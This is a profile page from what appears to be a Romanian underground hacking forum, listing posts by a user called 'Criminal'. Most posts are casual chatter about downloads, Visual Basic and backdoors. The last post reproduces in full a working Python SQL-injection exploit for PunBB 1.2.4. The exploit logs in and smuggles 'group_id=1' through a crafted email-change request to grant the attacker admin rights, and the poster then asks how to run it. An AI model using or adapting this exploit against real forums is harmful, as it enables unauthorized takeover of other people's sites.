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Everything posted by Criminal

  1. Criminal


    si mie si cine aduna mai multe puncte ...castiga admini hotarasc ce
  2. Sorry , but this page is closed for the moment ! Donate US at : http://MuOnline.ServeBlog.net/donate.php lol..nu mai mere
  3. dureaza foarte mult pana le downlaodezi si te tine pe loc nu poti naviga ....tre sa te intorci la threadu asta....poate cineva sa uploadeze pe rapidshare.ro ai voie sa uploadezi pana la un GB....as fi indatorat...si cum zice " tovarasul " meu de mai sus :comunist: dau o bere virtuala
  4. programul asta nu are extensie? la mine asa l-a downloadat...fara extensie:))
  5. incearcale si tu inainte sa le postezi
  6. Obiectul nu a fost gasit! URL-ul cerut nu a fost gasit pe acest server. Link-ul de pe pagina de unde ati venit pare a fi gresit sau invechit. Va rugam informati autorul acestei pagini despre eroare. Va rugam sa il contactati pe webmaster in cazul in care credeti ca aceasta este o eroare a serverului. Error 404 www.underground.ag Wed Jun 28 12:24:15 2006 Apache/2.0.53 (Linux/SUSE) Daca il mai ai pls upload pe rapidshare.ro
  7. Criminal


    ati putea face un chat exclusiv pentru acest forum e doar o sugestie
  8. imi place vb si vreau sa il invat bine...apoi ma apuc de altete ...cred k am reusit si cu .swf....incerc later ms oricum
  9. Kwe[R]ln chiar ai vrea sa apari in reclama aia?
  10. lol...cred k de pe forumul asta sunt doar 3-4 in stare sal sparga...si nu rezolva nimic
  11. nu cred k ar vrea sa fie dat la teveu...parerea mea...k dak il da....o sa il vedem in reclama cu "ti-am pregatit un pat la noi in celula"
  12. aproape nedetectabil scz..nu am putut sa ma abtin ))))
  13. chiar...are la bani si le da doar cateva milioane copiilor sai...jeez las tine pe fimiu cu p**a in nisip toata viata
  14. f**k him...el are noi nu...de asta nu imi place de el
  15. putin offtopic...stie cineva cum bag un flash intro forma de visual basic?sa fak un tut video pls raman dator
  16. 1 din ele este backdoor...si nu cred k e clientul
  17. de acord cu razvan...nu am dc...ajutati n00bi etc...e super aici
  18. nu am reusit imi da mereu eroare la cmd...operation is not ....
  19. da..dar sa fie script .vbs sau pentru visual basic as fi recunoscator
  20. acum cred k mam prins...dak ma incurc knd trec la practica te intreb ..ms:)
  21. ms mult dar i se schimba doar icoana...knd intru in el...apare o fereastra gen cmd si dispare repede...sti cumva dc?
  22. #!/usr/bin/python ####################################################################### # _ _ _ _ ___ _ _ ___ # | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ # | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ # |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| # ####################################################################### # Proof of concept code from the Hardened-PHP Project ####################################################################### # # -= PunBB 1.2.4 =- # change_email SQL injection exploit # # user-supplied data within the database is still user-supplied data # ####################################################################### import urllib import getopt import sys import string __argv__ = sys.argv def banner(): print "PunBB 1.2.4 - change_email SQL injection exploit" print "Copyright © 2005 Hardened-PHP Projectn" def usage(): banner() print "Usage:n" print " $ ./punbb_change_email.py [options]n" print " -h http_url url of the punBB forum to exploit" print " f.e. http://www.forum.net/punBB/" print " -u username punBB forum useraccount" print " -p password punBB forum userpassword" print " -e email email address where the admin leve activation email is sent" print " -d domain catch all domain to catch "some-SQL-Query"@domain emails" print "" sys.exit(-1) def main(): try: opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:D:") except getopt.GetoptError: usage() if len(__argv__) < 10: usage() username = None password = None email = None domain = None host = None for o, arg in opts: if o == "-h": host = arg if o == "-u": username = arg if o == "-p": password = arg if o == "-e": email = arg if o == "-d": domain = arg # Printout banner banner() # Check if everything we need is there if host == None: print "[-] need a host to connect to" sys.exit(-1) if username == None: print "[-] username needed to continue" sys.exit(-1) if password == None: print "[-] password needed to continue" sys.exit(-1) if email == None: print "[-] email address needed to continue" sys.exit(-1) if domain == None: print "[-] catch all domain needed to continue" sys.exit(-1) # Retrive cookie params = { 'req_username' : username, 'req_password' : password, 'form_sent' : 1 } wclient = urllib.URLopener() print "[+] Connecting to retrieve cookie" req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params)) info = req.info() if 'set-cookie' not in info: print "[-] Unable to retrieve cookie... something is wrong" sys.exit(-3) cookie = info['set-cookie'] cookie = cookie[:string.find(cookie, ';')] print "[+] Cookie found - extracting user_id" user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")] print "[+] User-ID: %d" % (int(user_id)) wclient.addheader('Cookie', cookie); email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"',' append = 'group_id='1' email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain params = { 'req_new_email' : email, 'form_sent' : 1 } print "[+] Connecting to request change email" req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params)) print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin" if __name__ == "__main__": main() Chestia e k mam pierdut...se deschide cu python...dar ce extensie sa ii pun la exploit?
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